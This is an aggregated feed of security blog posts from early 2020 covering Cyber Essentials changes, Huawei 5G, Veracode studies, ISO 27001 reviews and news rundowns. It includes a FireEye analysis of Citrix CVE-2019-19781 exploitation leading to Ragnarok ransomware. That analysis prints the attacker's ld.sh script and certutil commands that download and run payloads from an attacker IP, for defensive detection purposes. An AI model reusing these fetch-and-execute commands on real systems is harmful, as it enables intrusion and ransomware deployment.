  • All renewals administered through IASME will be treated similarly to new applications, meaning data for Cyber Essentials assessments will need to be entered from scratch.
  • IT Governance customers will still be able to access their completed Cyber Essentials applications in the IT Governance Cyber Essentials portal, but we will not be able to transfer any data to IASME.

We urge customers to renew their certifications before 31 March 2020, even if it means bringing forward their certifications, to avoid having to start the process from scratch.

What about Cyber Essentials Plus?

  • All Cyber Essentials Plus applications continue as normal until 31 March 2020.
  • From 1 April, Cyber Essentials basic certification will be a prerequisite of Cyber Essentials Plus. Customers will be required to achieve the basic level first, followed by the Cyber Essentials Plus element, whichmust be completed within a mandatory three-month period and could incur additional charges.

Save yourself the hassle by securing early certification renewal

As we are a CREST-accredited certification body, you can fast-track your renewal through the IT Governance online portal before 31 March and reap the benefits of a simple, fast and convenient process.

Renewing your certification with IT Governance before the IASME-controlled process begins has many benefits:

CEtable

Get certified or renew your certification now. 

The post How will Cyber Essentials changes affect you? appeared first on IT Governance UK Blog.

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

Huawei is a Chinese telecoms company founded in 1987. US officials believe it poses a security risk because the Chinese government will make the firm engineer backdoors in its technology, through which information could be accessed by Beijing. Donald Trump has banned US companies from sharing technology with Huawei and has been putting pressure on other nations to follow suit.

Continue reading...

Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact??「 of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours, annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to additional $888,000 in annual profit  

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save ??? on average ??? almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact??「 of Veracode???s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Weekly Update 175

Weekly Update 175

Alright, let me get this off my chest first - I've totally lost it with these bloody Instamics. I've had heaps of dramas in the past with recordings being lost and the first time I do a 3-person weekly update only 2 of them recorded (mine being the exception). I was left with a zero-byte file on my unit which we tried to recover to no avail. It's not just that; the mobile app is clunky AF (Scott was demonstrating how many times he had to mash a button on his just to get it to connect to a mic), firmware updates require an install on the PC (which at least previously, was unsigned code loaded over HTTP via an IP address), the levels on them are unpredictable and somehow Scott ended up with a blinky light on his last week. So this video has ended up with only Scott's and Ari's mics working and me in the background along with a whole lot of unwanted conference scene noise - sorry! Anyone got a recommendation for a portable audio recorder that can take a few lav mic inputs?

Moving on, we've just wrapped up NDC Security in Oslo where Scott, Ari and I have all delivered sessions of one kind or another. HIBP also hit the 3M subscriber mark this week and Scott is lamenting how slow his browsing experience has become without his Pi-hole. Next week's update will come from London where I'll try and do a much better job of the audio before getting home and getting a decent recorder - get these recommendations in!

Weekly Update 175
Weekly Update 175
Weekly Update 175
Weekly Update 175

References

  1. Ari held a session on teaching kids to code (that's a link through to this week's blog post on what he covered in the session)
  2. We'll all be at NDC London next week (I'll be workshopping, Ari coding with kids and both Scott and I delivering more talks)
  3. Scott and I are both missing our Pi-holes (looking forward to getting home to a faster browsing experience!)
  4. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename

Functionality

MD5

x86.dll

32-bit Downloader

9aa67d856e584b4eefc4791d2634476a

x64.dll

64-bit Downloader

55b40e0068429fbbb16f2113d6842ed2

scan.py

Python socket scanner

b0acb27273563a5a2a5f71165606808c

xp_eternalblue.replay

Exploit replay file

6cf1857e569432fcfc8e506c8b0db635

eternalblue.replay

Exploit replay file

9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter, and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type

Indicator

Notes

Network

45[.]120[.]53[.]214

 

Network

198[.]44[.]227[.]126

 

Host

91dd06f49b09a2242d4085703599b7a7

piz.Lan

Host

01af5ad23a282d0fd40597c1024307ca

de.py

Host

bd977d9d2b68dd9b12a3878edd192319

ld.sh

Host

0caf9be8fd7ba5b605b7a7b315ef17a0

.new.zip

Host

9aa67d856e584b4eefc4791d2634476a

x86.dll

Host

55b40e0068429fbbb16f2113d6842ed2

x64.dll

Host

b0acb27273563a5a2a5f71165606808c

scan.py

Host

6cf1857e569432fcfc8e506c8b0db635

xp_eternalblue.replay

Host

9e408d947ceba27259e2a9a5c71a75a8

eternalblue.replay

Host

e345c861058a18510e7c4bb616e3fd9f

avpass.exe

Host

48452dd2506831d0b340e45b08799623

since1969.exe

Email Address

asgardmaster5@protonmail[.]com

From ransom note

Email Address

ragnar0k@ctemplar[.]com

From ransom note

Email Address

j.jasonm@yandex[.]com

From ransom note

Table 3: Collection of IOCs from this blog post

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding ??? backed by the Forrester Analytics Global Business Technographicsツョ Security Survey, 2019 ??? is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common form of breaches, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing occasional prerelease scans. According to Veracode???s State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, have less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This concept helps save time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans, it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.

Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can be caught up in no time. Read the full Forrester report for details on the state of AppSec in government agencies.

Cyber News Rundown: Cannabis User Data Breach

Reading Time: ~ 2 min.

Point-of-Sale Breach Targets U.S. Cannabis Industry

Late last month, researchers discovered a database owned by the company THSuite that appeared to contain information belonging to roughly 30,000 cannabis customers in the U.S. With no authentication, the researchers were able to find contact information as well as cannabis purchase receipts, including price and quantity, and even scanned copies of employee and government IDs. Though many of the records were for recreational users, medical patients were also involved in the breach, which could prompt additional investigations regarding HIPAA violations.

Ransomware Attack Shuts Down Florida Libraries

At least 600 computers belonging to the library system of Volusia County, Florida were taken offline after falling victim to an unconfirmed ransomware attack. While the libraries were able to get 50 computers back up and running, many of their core functionalities are still offline for the time being. Though officials still have not confirmed that ransomware was the cause of the shutdown, the attack is similar to ones targeting multiple California libraries less than a week earlier.

UK Government Allows Gambling Firms Access to Children’s Data

The Information Commissioner’s Office (ICO) was recently informed of a data breach that could affect nearly 28 million students in the UK. A gambling firm was apparently given access to a Department for Education database by a third-party vendor to complete age and ID verification, though it is unclear just how much information they were gathering. Both firms and the Department for Education have begun examining this breach to determine if this requires a full GDPR investigation.

International Law Enforcement Efforts Take Down Breach Dealer Site

In a combined effort from multiple law enforcement agencies in the U.S. and Europe, two individuals who operated a site that sold login credentials from thousands of data breaches were arrested. Immediately following the arrests, the domain for WeLeakInfo was taken down and all related computers were seized by police, who then promptly put up an official press release and request for any additional info on the site or owners. WeLeakInfo, which boasted access to over 12 billion records, was originally hosted by a Canadian company, but was quick to employ Cloudflare to continue their nefarious dealings privately.

UPS Store Exposes Customer Data

Roughly 100 UPS Stores across the U.S. fell victim to a phishing attack that compromised sensitive customer information over the last four months. This incident stems from a malicious phishing attack that allowed some individuals to compromise store email accounts, which then allowed access to any documents that had been exchanged between the accounts and customers, from passports and IDs to financial info. Fortunately, UPS has already begun contacting affected customers and is offering two years of credit and identity monitoring.

The post Cyber News Rundown: Cannabis User Data Breach appeared first on Webroot Blog.

ISO 27001 management review: a practical guide

As part of their ISO 27001 compliance, organisations must conduct management reviews to address any emerging information security trends and to ensure that their ISMS (information security management system) works as intended.

Unfortunately, there’s a mistaken belief that the review is only necessary as part of the certification audit. That couldn’t be further from the truth, as we explain in this blog.

The purpose of the ISO 27001 management review

Management reviews give senior staff the opportunity to evaluate the effectiveness of their organisation’s ISMS and make any changes that could boost its ability to protect sensitive information.

The criteria for an effective ISMS will have been addressed as part of your work conforming with Clause 4 of ISO 27001, which covers the organisation and its context, the requirements of interested parties, the scope of the ISMS and risk management.

The management review also gives you the opportunity to inform senior staff of any changes or revisions that have been made to the day-to-day workings of the ISMS.

What the management review should cover

Clause 9.3 of ISO 27001 outlines what your management review should cover.

Your first order of business is to revisit any ongoing actions that you decided upon in previous management reviews.

For example, you might have requested statistical analysis related to certain practices, or decided to adjust a process. Now is the time to check them and get further comment.

Next, you should discuss any external or internal issues that are relevant to the ISMS.

‘Internal and external issues’ is a phrase introduced in Clause 4.1 of ISO 27001, and refers to things that could affect your sensitive information.

Internal issues include things related to information assets, people, products and systems, whereas external issues might include political problems, economic fluctuations and new technologies.

The third item on your agenda is the overall performance of your ISMS. You should focus on:

  • Areas of the ISMS that aren’t working as intended;
  • Actions you’ve taken to address previously identified weaknesses;
  • The ongoing monitoring of your ISMS’s performance;
  • Audit results and the fulfilment of information security objectives;
  • Feedback from interested parties;
  • Results of your risk assessment and the status of the risk treatment plan; and
  • Opportunities for continual improvement.

Who should attend the management review?

As the name suggests, senior management should play a key role. This might take the form of an ‘ISMS board’ – i.e. a group of senior staff that is tasked with overseeing information security issues.

The ISMS board generally includes the CISO and other executives, along with department heads who oversee the handling of large volumes of sensitive information.

How often should management reviews be conducted?

You are required to conduct a management review at least once a year, and more frequently if there are any material changes that could affect your ISMS.

However, we suggest holding meetings more regularly than this, because you’ll have a lot to cover and will find that information security issues evolve quickly.

How frequently you hold meetings is up to you – but we think quarterly or monthly get-togethers are more suitable.

Getting the most out of the management review

Here are some tips to help you get started:

  1. Keep attendees to a minimum

You don’t need to fill the room to get as many opinions as possible. You’re better off with a small group of people whose insight you value.

Attendees can consult with colleagues outside of the meeting if they need further advice or information – and you can invite people as needed– but this isn’t the time for an organisation-wide discussion.

  1. Keep management reviews and management meetings separate

Senior staff probably already meet up on a regular basis to address the day-to-day operations of the organisation, but don’t fall into the trap of thinking you can slide your management reviews into these meetings.

If you do, you’ll find that issues are conflated or that information security concerns are pushed aside in favour of more urgent business matters.

  1. Keep minutes

ISO 27001 requires you to document the content and results of your management reviews, so someone will need to keep minutes.

This isn’t simply to prove that you’ve been holding meetings. It helps remind you of any topics that came up and the decisions you made regarding them.

  1. Provide a summary

Attendees often find it helpful to have a brief round-up of what was discussed in addition to the minutes, which can be hard to navigate if you’re looking for a summary of a specific issue.

Summaries are best produced soon after the meeting has finished, so the person producing it still has all the information fresh in their mind. They can then circulate the write-up in an email.

Learn more about risk management

Discover what risk management entails with our Certified ISO 27005 ISMS Risk Management Training Course.

In three days, you’ll gain the skills and knowledge needed to implement and maintain a risk management programme based on the best practices outlined in ISO 27005 and other risk management techniques.

Find out more

The post ISO 27001 management review: a practical guide appeared first on IT Governance UK Blog.

In for the weakness, in for the Hack

On my 1st week of the basic course in the Israeli army I was taught that in terms of information security there is no information item that is too negligible or too small to deal with.

The base location, the unit’s name, how big is my team – shall not be told.
There is no need to brag about the amazing projects we do
and
There is no reason to connect external media to computers

EVERYTHING about information security is important and must be afterthought.

That approach is based on the assumption, that a person who was educated from the very 1st moment not to disclose the name of the unit (barely the city it is located at) will be very minded and aware with information of real potential harm.

This is an excellent and well-proven attitude with regard to security, and I’d expect it to be a corner stone in mission critical cyber security organizations and industries such as: medical, energy, avionics and automotive.

You can imagine how surprised I was when I heard too many times from too senior executives in tone-dictating companies:

“The distance between weakness to hack to actually take over a vehicle and put people in jeopardy is very large. We shall not be excited by each vulnerability.”

Technically, to some extent, they are right. The transition from weakness to exploitation is significant and sometimes impossible. Not every weakness will end in ransomware massage on your airplane infotainment screen.

But this is exactly the intricate approach to security events that we must not remain indifferent to.

After all, taking control of a Jeep Cherokee was a combination of weaknesses, exploitation methods, not well protected communication, etc.

At the end of the day, each cyber incident begins with a weakness that was not well covered, or published or addressed – piling  on top of that a great motivation, high technical skills and tenacity will lead to an assault that will make you wanna cry.

As Lau Tzu said ‘A journey of a thousand miles begins with a single step

In cyber-security arena a small buffer overflow – can sometimes be this single step required

With cyber security we must go ‘All-In’ and leave nothing to luck. We must identify all the threats and evaluate the degree of exposure each one produces.

This knowledge provides us with options to tackle and resolve – some as simple as use different compilation method, some as complex as applying to the supply chain and development teams and some can be solved through an operative mechanism and processes.

I know that this ‘epiphany’ moment about the security status of your product usually causes more headaches than reliefs – since it usually brings a flood of new issues and gaps and their treatment does not make it easier to meet the schedule or increase the margins.

Much easier and more fun is to cover with the warm blanket of the blessed ignorance and practice surprised gestures.

To my opinion this is not a privilege we have in critical infrastructures and specifically in the current era of revolution. We strive for a shared, electronic and autonomous world – cyber attack will stave off the revolution and create a severe blow to the spirit of progress we all enjoy anticipating.

I know that the cyber security industry aware of these needs, there are solution (am sure that they can get better) for doing just that: Cyber Risk Assessment – mapping vulnerabilities, finding violation of security policies, competence with the emerging ISO 21434, hardening issues, mal performance of encryption and even identifying the entire software stack. Risk assessment is conducted to avoid incidents and the right measures should be devoted to do just that – Avoid incidents, not respond, avoid.

To sum up, as I was told by the first sergeant while patrolling around the base, and as ‘Ivar the Boneless’ discovered at the last season of the Vikings – A single uncovered crack and you may loose the fortress, Loose the Trust of the people and find yourself dinning with the Gods at Valhalla.

Therefore, don’t oversee your flaws and vulnerabilities – the progress starts there – you should accept yourself (and your not perfect code) as you are and strive for improvement.

Guest blog Written by Eddie Lazebnik  – Brining 15 years of cyber experience – both in private and public sector and recently in a groundbreaking startup.  Served for about a decade the Isreali government and military organizations of Cyber Security. Possessing education in business administration, having a proven technical execution record and great passion for technology and innovation. Very excited about the revolution of IoT and specifically in Automotive industry -connected and autonomous vehicles. These days leading strategy and strategic partnerships activity in Cybellum.

The post In for the weakness, in for the Hack appeared first on CyberDB.

AI, automation emerge as critical tools for cybersecurity

Artificial intelligence and automation adoption rates are rising, and investment plans are high on enterprise radars. AI is in pilots or use at 41% of companies, with another 42% actively researching it, according to the 2019 IDG Digital Business Study.

Cybersecurity has emerged as an ideal use case for these technologies. Digital business has opened a score of new risks and vulnerabilities that, combined with a security skills gap, is weighing down security teams. As a result, more organizations are looking at AI and machine learning as a way to relieve some of the burden on security teams by sifting through high volumes of security data and automating routine tasks.

To read this article in full, please click here

Identity Management & Access Control in Multiclouds Workshop and Conference

Note: Captions will be provided by February 11, 2020. Co-hosted by Tetrate This one-and-a-half day conference will focus on identity management and access control in multi-clouds to mitigate insider threats and return control back to owners of applications and data. Emphasis will be placed on emerging concepts such as zero-trust architecture where gaining entry through a firewall or having an IP address does not provide additional privileges. The workshop will address attacks by implementing mutual TLS, secure service discovery, traffic encryption between services, and access control at the

Kids and Code: Object Oriented Programming with Code Combat

Kids and Code: Object Oriented Programming with Code Combat

Geez time flies. It's just a tad under 4 years ago that I wrote about teaching kids to code with code.org which is an amazing resource for young ones to start learning programming basics. In that post I shared a photo of my then 6-year-old son Ari holding a Lenovo Yoga 900 I gifted him as part of the Insiders program I'm involved in:

Kids and Code: Object Oriented Programming with Code Combat

He got a lot of mileage out of that machine and learned a lot about the basics of both code and using a PC. Today seemed like a good time to follow up on that post, starting with a new machine:

Kids and Code: Object Oriented Programming with Code Combat

This one is a Lenovo Yoga C940 and for full disclosure, it came courtesy of the same program his last one did. The 900 was a great machine but it ultimately succumbed to the sort of treatment you'd expect a 6 / 7 / 8 / 9 / 10-year-old to dish out over a period of 4 years. The new machine times well with him moving into year 5 which, for his school, is the first year that kids need to start bringing a laptop in with them. Curiously, the requirement there is for a Windows-based touch screen machine (I imagine Mac families aren't real happy about that...) which suits the Yoga just fine. Plus, it does the whole bendy flippy "yoga" thing so it can be used in tablet mode too (more on that later):

Kids and Code: Object Oriented Programming with Code Combat

Flush with good machines myself (I run a ThinkPad P1 as my primary machine and the P50 I wrote about years ago as a backup), when the C940 arrived the other day I thought it was time to do an updated post. I also want to use this post as an opportunity to plug a couple of upcoming free events Ari and I will be running for kids:

  1. DevClub @ NDC Security Oslo, Wednesday 22 Jan
  2. DevClub @ NDC London, Thursday 30 Jan

They both run at the end of the day during the respective NDC conferences and they're a great way to expose kids to code. I wrote about this briefly when we announced the events in November, let's now move on to a few of the Code Combat basics.

Firstly, get into it for free at codecombat.com. Being browser based there's no install, no setups, no elevated privileges required etc etc. Just point and go.

Code Combat takes you through a progression of levels that gradually introduce new concepts akin to the ones we use in everyday "adult" programming. For example, take a look at the following screen:

Kids and Code: Object Oriented Programming with Code Combat

You'll see the language is set to Python and the code window represents a whole bunch of common programmatic constructs including:

  1. Comments
  2. Variables
  3. Data types
  4. Methods
  5. Arguments

You can run the code as is (this is populated by default at the beginning of each level), but the objective of this particular exercise won't be met so the code will fail. You can then debug the code, modify it and re-run, just like we'd do when writing software as a profession. It's somewhat gamified with heroes fighting enemies and animations that make the whole thing a lot more engaging so at least in our experience, it's something he's quite happy sitting down plugging away at for decent amounts of time without it becoming tedious.

As with most games, as you progress through the levels new concepts are introduced and the complexity increases. For example, some of the aforementioned programmatic constructs are introduced in the "Defense of Plainswood" level:

Kids and Code: Object Oriented Programming with Code Combat

Keep going further through the levels and more concepts are introduced, including some you'll be pretty familiar with yourself if code is your day job:

Kids and Code: Object Oriented Programming with Code Combat

So that's Code Combat in a nutshell and I'd highly recommend getting your kids involved with it. If they're a bit younger like Ari was in that first blog post then get them on over to code.org but either way, give them the opportunity to code. I never push either of my kids in this direction (my 7-year-old daughter regularly uses code.org), but I've found just a little bit of exposure has been enough to have them coming back and continually asking to do more. Clearly, they enjoy it (this vid is a good example of where the touch screen and convertibility of the Lenovo Yoga is really handy too):

That's it on the kids coding front for now, if you're in Oslo this week or London next week then do please get along to one of the NDC events, we'd love to see a great turnout of parents and their kids. Who knows, it might just be the spark they need to set them on a passionate (and maybe even professional) coding journey.

Report: A Cyberattack Could Severely Disrupt the US Financial System

A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States. In the report, analysts examined a scenario in which a single-day shock hits the country???s payment network, Fedwire, measuring the broad impact it would have on the economy. The results? A significant 38 percent of the network would be affected on average by significant spillovers to other banks, damaging the stability of the broader financial system in the United States.

How an attack might unfold

According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows financial institutions to continue receiving payments but prevents them from sending any payments throughout the operating day. In this scenario, because payments are actualized when Fedwire receives requests from senders, an institution???s balance in the system immediately reflects those changes???yet the targeted financial institution is unable to interact with Fedwire, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.

Timing matters too and can magnify the impacts of a breach. ???Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater,??? the report says. ???We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge.???

The domino effect of liquidity hoarding

An important point to consider from this analysis is that the consequence of hoarding cash and forgoing payments during a breach can worsen the situation. The report explains, ???We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk.??? As banks are not necessarily perceptive of daily liquidity conditions because they have ample reserves on hand, they likely will not react to these irregularities very quickly. Thus, all institutions other than the one impacted by a breach will continue to make payments as usual, resulting in substantial interruptions in the network.

It???s a domino effect that could shake up the whole system. Analysts uncovered a correlation between assets and payments over 80 percent, finding that a smaller subset of banks plays a vital role in markets like equity and Treasury. A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause quite a headache that extends beyond the impacted institutions, reaching into the economy.

Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.

Strengthening security for financial institutions

Considering the above scenario, data from our most recent State of Software Security report (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.

Our data uncovers best practices that are dramatically improving remediation times and reducing overall security debt. The analysis for this year???s report found that when organizations scan their applications for security more than 260 times per year their median fix time drops from 68 days to 19 days???a 72% reduction.

Get more details on the application security trends and best practices in the full SOSS report.

 

How Industry Collaboration Created a Unified PIN Standard


On the blog we discuss a joint collaboration between PCI SSC and ASC X9 to create a unified PIN standard with Troy Leach, Senior Vice President, of the PCI SSC and Steve Stevens, Executive Director of ASC X9.  In response to industry feedback, the Accredited Standards Committee X9 Inc. (ASC X9) and the PCI Security Standards Council (PCI SSC) have recently completed a joint initiative to create one unified PIN Security Standard for payments stakeholders.

Cyber News Rundown: Ryuk Uses Wake-on-Lan

Reading Time: ~ 2 min.

Ryuk Adds New Features to Increase Devastation

The latest variant of the devastating Ryuk ransomware has been spotted with a new feature that allows it to turn on devices connected to the infected network. By taking advantage of Wake-on-Lan functionality, Ryuk can is able to mount additional remote devices to further its encryption protocols. While it’s possible to only allow such commands from an administrator’s machine, those are also the most likely to be compromised since they have the largest access base.

Learn more about ransomware infections and how to protect your data from cybercrime.

Bank Hackers Arrested Outside London

Over the course of six years, two individuals were able to successfully hack into many hundreds of bank and phone accounts with the intent to commit fraud. With the information they gathered, the two were also able to open new credit accounts and take out significant loans to purchase extra tech hardware. Officials for the London Metropolitan Police have made it known that cybercrime is taken just as seriously as any other crime.

Cryptominer Found After Multiple BSODs

